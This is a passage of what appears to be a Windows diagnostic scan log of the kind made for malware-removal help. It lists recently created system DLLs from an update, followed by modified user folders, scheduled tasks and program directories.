2016-04-12 21:53 - 2016-03-29 07:26 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-04-12 21:53 - 2016-03-29 07:23 - 00777728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsSpellCheckingFacility.dll
2016-04-12 21:53 - 2016-03-29 07:22 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-04-12 21:53 - 2016-03-29 07:19 - 02635776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-04-12 21:53 - 2016-03-29 07:17 - 00765952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-04-12 21:53 - 2016-03-29 07:14 - 01072128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-04-12 21:53 - 2016-03-29 07:13 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-04-12 21:53 - 2016-03-29 07:10 - 03671040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-12 21:53 - 2016-03-29 07:05 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-04-12 21:53 - 2016-03-29 07:05 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-04-12 21:53 - 2016-03-29 07:05 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-04-12 21:53 - 2016-03-29 07:05 - 01388032 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-12 21:53 - 2016-03-29 07:05 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-04-12 21:53 - 2016-03-29 07:04 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-04-12 21:53 - 2016-03-29 07:02 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-04-12 21:53 - 2016-03-29 07:01 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-04-12 21:53 - 2016-03-29 06:58 - 01799680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-04-12 21:53 - 2016-03-29 06:51 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-04-12 21:53 - 2016-03-29 06:49 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-04-12 21:53 - 2016-03-29 06:45 - 03078144 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-04-12 21:53 - 2016-03-29 06:43 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-04-12 21:53 - 2016-03-29 06:43 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-04-12 21:53 - 2016-03-29 06:41 - 12125184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-12 21:53 - 2016-03-29 06:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-12 21:53 - 2016-03-29 06:38 - 02798080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-04-12 21:53 - 2016-03-29 06:36 - 02722816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-04-12 21:53 - 2016-03-29 06:27 - 07836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-12 21:53 - 2016-03-29 06:27 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-12 21:53 - 2016-03-29 06:26 - 00958976 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-04-12 21:53 - 2016-03-29 06:25 - 00712704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-04-12 21:52 - 2016-04-02 05:10 - 00770640 _____ (Microsoft Corporation) C:\WINDOWS\system32\iuilp.dll
2016-04-12 21:52 - 2016-04-02 05:10 - 00374008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-04-12 21:52 - 2016-04-02 04:30 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-04-12 21:52 - 2016-04-02 04:29 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-04-12 21:52 - 2016-04-02 04:25 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2016-04-12 21:52 - 2016-04-02 04:25 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NotificationObjFactory.dll
2016-04-12 21:52 - 2016-04-02 04:23 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-04-12 21:52 - 2016-04-02 04:23 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-04-12 21:52 - 2016-04-02 04:08 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-04-12 21:52 - 2016-04-02 04:03 - 04774912 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-04-12 21:52 - 2016-03-29 11:23 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-04-12 21:52 - 2016-03-29 11:15 - 00100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2016-04-12 21:52 - 2016-03-29 11:02 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-12 21:52 - 2016-03-29 11:02 - 00334736 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2016-04-12 21:52 - 2016-03-29 10:28 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-04-12 21:52 - 2016-03-29 10:25 - 00058400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.dll
2016-04-12 21:52 - 2016-03-29 10:18 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-04-12 21:52 - 2016-03-29 10:11 - 00605440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-12 21:52 - 2016-03-29 10:11 - 00074424 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.exe
2016-04-12 21:52 - 2016-03-29 10:10 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-04-12 21:52 - 2016-03-29 10:09 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-04-12 21:52 - 2016-03-29 10:07 - 00081144 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-04-12 21:52 - 2016-03-29 09:44 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-04-12 21:52 - 2016-03-29 09:41 - 00051128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.dll
2016-04-12 21:52 - 2016-03-29 09:26 - 01089888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-12 21:52 - 2016-03-29 09:26 - 00073872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-04-12 21:52 - 2016-03-29 09:25 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-04-12 21:52 - 2016-03-29 09:23 - 00069744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-04-12 21:52 - 2016-03-29 09:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-04-12 21:52 - 2016-03-29 09:16 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-04-12 21:52 - 2016-03-29 09:07 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2016-04-12 21:52 - 2016-03-29 09:07 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-04-12 21:52 - 2016-03-29 09:07 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2016-04-12 21:52 - 2016-03-29 09:07 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsdchngr.dll
2016-04-12 21:52 - 2016-03-29 09:06 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-04-12 21:52 - 2016-03-29 09:06 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacchooks.dll
2016-04-12 21:52 - 2016-03-29 09:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-04-12 21:52 - 2016-03-29 09:00 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-04-12 21:52 - 2016-03-29 09:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveskybackup.dll
2016-04-12 21:52 - 2016-03-29 09:00 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-04-12 21:52 - 2016-03-29 08:59 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-04-12 21:52 - 2016-03-29 08:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-04-12 21:52 - 2016-03-29 08:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-04-12 21:52 - 2016-03-29 08:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-04-12 21:52 - 2016-03-29 08:57 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-12 21:52 - 2016-03-29 08:57 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-04-12 21:52 - 2016-03-29 08:57 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-04-12 21:52 - 2016-03-29 08:55 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-04-12 21:52 - 2016-03-29 08:55 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-04-12 21:52 - 2016-03-29 08:55 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-04-12 21:52 - 2016-03-29 08:54 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-12 21:52 - 2016-03-29 08:53 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-12 21:52 - 2016-03-29 08:52 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-04-12 21:52 - 2016-03-29 08:51 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-04-12 21:52 - 2016-03-29 08:51 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-04-12 21:52 - 2016-03-29 08:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\BdeHdCfgLib.dll
2016-04-12 21:52 - 2016-03-29 08:50 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-04-12 21:52 - 2016-03-29 08:50 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-04-12 21:52 - 2016-03-29 08:50 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2016-04-12 21:52 - 2016-03-29 08:49 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-12 21:52 - 2016-03-29 08:48 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-04-12 21:52 - 2016-03-29 08:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-04-12 21:52 - 2016-03-29 08:46 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-04-12 21:52 - 2016-03-29 08:44 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFWSD.dll
2016-04-12 21:52 - 2016-03-29 08:36 - 00530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2016-04-12 21:52 - 2016-03-29 08:35 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2016-04-12 21:52 - 2016-03-29 08:35 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-04-12 21:52 - 2016-03-29 08:34 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-12 21:52 - 2016-03-29 08:34 - 00333824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-04-12 21:52 - 2016-03-29 08:34 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2016-04-12 21:52 - 2016-03-29 08:33 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-04-12 21:52 - 2016-03-29 08:32 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-04-12 21:52 - 2016-03-29 08:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-04-12 21:52 - 2016-03-29 08:30 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-12 21:52 - 2016-03-29 08:26 - 00169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2016-04-12 21:52 - 2016-03-29 08:23 - 00694784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-04-12 21:52 - 2016-03-29 08:21 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-12 21:52 - 2016-03-29 08:20 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.V2.dll
2016-04-12 21:52 - 2016-03-29 08:20 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsdchngr.dll
2016-04-12 21:52 - 2016-03-29 08:19 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-04-12 21:52 - 2016-03-29 08:19 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacchooks.dll
2016-04-12 21:52 - 2016-03-29 08:18 - 00676352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDApi.dll
2016-04-12 21:52 - 2016-03-29 08:17 - 00708608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-12 21:52 - 2016-03-29 08:16 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-04-12 21:52 - 2016-03-29 08:12 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-04-12 21:52 - 2016-03-29 08:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-04-12 21:52 - 2016-03-29 08:11 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-04-12 21:52 - 2016-03-29 08:11 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-12 21:52 - 2016-03-29 08:11 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-04-12 21:52 - 2016-03-29 08:11 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-04-12 21:52 - 2016-03-29 08:09 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-04-12 21:52 - 2016-03-29 08:09 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2016-04-12 21:52 - 2016-03-29 08:08 - 00888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-04-12 21:52 - 2016-03-29 08:08 - 00841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-04-12 21:52 - 2016-03-29 08:08 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-12 21:52 - 2016-03-29 08:06 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2016-04-12 21:52 - 2016-03-29 08:05 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2016-04-12 21:52 - 2016-03-29 08:04 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2016-04-12 21:52 - 2016-03-29 08:03 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-04-12 21:52 - 2016-03-29 08:00 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-04-12 21:52 - 2016-03-29 08:00 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-04-12 21:52 - 2016-03-29 08:00 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-12 21:52 - 2016-03-29 08:00 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-04-12 21:52 - 2016-03-29 07:59 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-04-12 21:52 - 2016-03-29 07:59 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-04-12 21:52 - 2016-03-29 07:59 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-04-12 21:52 - 2016-03-29 07:53 - 00323072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-04-12 21:52 - 2016-03-29 07:53 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-04-12 21:52 - 2016-03-29 07:52 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-12 21:52 - 2016-03-29 07:52 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\easwrt.dll
2016-04-12 21:52 - 2016-03-29 07:49 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-04-12 21:52 - 2016-03-29 07:48 - 00346624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-04-12 21:52 - 2016-03-29 07:42 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-12 21:52 - 2016-03-29 07:41 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-04-12 21:52 - 2016-03-29 07:39 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSDApi.dll
2016-04-12 21:52 - 2016-03-29 07:39 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-12 21:52 - 2016-03-29 07:38 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-04-12 21:52 - 2016-03-29 07:34 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-04-12 21:52 - 2016-03-29 07:32 - 00854528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-04-12 21:52 - 2016-03-29 07:32 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-04-12 21:52 - 2016-03-29 07:32 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-04-12 21:52 - 2016-03-29 07:32 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-04-12 21:52 - 2016-03-29 07:32 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2016-04-12 21:52 - 2016-03-29 07:31 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-04-12 21:52 - 2016-03-29 07:29 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-04-12 21:52 - 2016-03-29 07:29 - 00256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-04-12 21:52 - 2016-03-29 07:27 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-04-12 21:52 - 2016-03-29 07:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-04-12 21:52 - 2016-03-29 07:27 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-04-12 21:52 - 2016-03-29 07:27 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-04-12 21:52 - 2016-03-29 07:27 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-04-12 21:52 - 2016-03-29 07:06 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-04-12 21:52 - 2016-03-29 07:05 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-04-12 21:52 - 2016-03-29 07:04 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-12 21:52 - 2016-03-29 07:01 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2016-04-12 21:52 - 2016-03-29 07:00 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-04-12 21:52 - 2016-03-29 06:45 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2016-04-12 21:52 - 2016-03-29 06:35 - 00821248 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-04-12 21:52 - 2016-03-29 06:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-04-12 21:52 - 2016-03-29 06:27 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2016-04-12 21:52 - 2016-03-29 06:26 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\FWPUCLNT.DLL
2016-04-12 21:52 - 2016-03-29 06:25 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL
2016-04-12 21:52 - 2016-03-29 06:21 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-09 02:06 - 2016-04-09 02:06 - 00002416 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium.lnk
2016-04-09 02:06 - 2016-04-09 02:06 - 00002408 _____ C:\Users\Administrator\Desktop\Chromium.lnk
2016-04-09 02:06 - 2016-04-09 02:06 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
2016-04-09 02:05 - 2016-04-09 02:06 - 00000000 ____D C:\Users\Administrator\AppData\Local\{E8DFDE83-CC77-B23B-A1EF-97D385876B4B}
2016-03-26 23:02 - 2016-03-26 23:02 - 00015215 _____ C:\Users\Administrator\Downloads\The-Witch.2016.DVDRip.Full_.Movie_.torrent

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-04-25 19:58 - 2015-10-24 21:38 - 00000000 ____D C:\Users\Administrator\Airstream
2016-04-25 19:47 - 2015-09-25 23:06 - 00000000 ___RD C:\Users\Administrator\OneDrive
2016-04-25 19:47 - 2014-06-21 14:36 - 00000000 ___RD C:\Users\Administrator\Dropbox
2016-04-25 19:46 - 2010-11-10 20:52 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-25 15:59 - 2014-09-13 18:52 - 00005063 _____ C:\WINDOWS\SysWOW64\LOCALSERVICE.INI
2016-04-25 15:34 - 2010-11-10 20:52 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-25 15:23 - 2010-06-26 18:35 - 00000898 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job
2016-04-25 15:17 - 2015-06-19 20:06 - 00000950 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA.job
2016-04-25 10:05 - 2016-02-12 19:32 - 00004158 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{4346DC72-8560-4679-852D-4DFC6F90FB49}
2016-04-25 03:16 - 2013-09-08 18:53 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
2016-04-24 23:17 - 2015-06-19 20:06 - 00000898 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core.job
2016-04-24 19:48 - 2013-04-05 19:50 - 00004282 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-04-23 22:31 - 2015-02-05 00:00 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-04-23 20:33 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-22 20:35 - 2014-09-20 21:15 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-22 20:33 - 2015-10-30 08:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-21 20:56 - 2011-04-10 21:03 - 00000000 ____D C:\Users\Administrator\Documents\Vuze Downloads
2016-04-21 20:46 - 2009-09-07 15:42 - 00000943 _____ C:\WINDOWS\SysWOW64\bscs.ini
2016-04-21 20:45 - 2015-12-18 05:37 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-21 20:45 - 2015-10-30 07:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-21 20:37 - 2013-12-16 23:33 - 00000000 ____D C:\AdwCleaner
2016-04-21 20:35 - 2015-09-25 23:06 - 00002429 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-20 20:59 - 2015-10-30 08:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-04-20 20:58 - 2014-08-16 22:43 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-04-19 17:06 - 2011-02-09 23:17 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Azureus
2016-04-17 23:11 - 2015-10-30 08:21 - 00000000 ____D C:\WINDOWS\INF
2016-04-17 23:05 - 2011-12-23 16:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\Downloaded Installations
2016-04-17 22:59 - 2009-12-07 10:39 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-04-17 22:49 - 2015-01-27 21:24 - 00000000 ____D C:\Users\Administrator\Desktop\misc
2016-04-17 20:01 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-17 20:01 - 2011-02-09 21:19 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
2016-04-16 20:14 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 00:26 - 2015-12-18 05:15 - 00000000 ____D C:\Users\Administrator
2016-04-15 21:07 - 2011-02-27 19:34 - 00000000 ____D C:\Program Files\trend micro
2016-04-15 21:03 - 2011-12-19 00:49 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\DivX
2016-04-15 21:03 - 2010-06-27 21:14 - 00000000 ____D C:\Program Files\DivX
2016-04-15 21:03 - 2010-06-27 19:53 - 00000000 ____D C:\Program Files (x86)\DivX
2016-04-15 21:03 - 2010-06-27 19:50 - 00000000 ____D C:\ProgramData\DivX
2016-04-15 21:01 - 2015-12-12 17:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-15 21:01 - 2015-12-12 17:00 - 00000000 ____D C:\Program Files (x86)\Wondershare
2016-04-15 20:55 - 2015-12-18 05:14 - 01009692 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-15 20:14 - 2014-06-15 15:40 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Dropbox
2016-04-15 20:13 - 2015-06-19 20:06 - 00000000 ____D C:\Users\Administrator\AppData\Local\Dropbox
2016-04-15 20:01 - 2015-12-18 05:06 - 05043128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
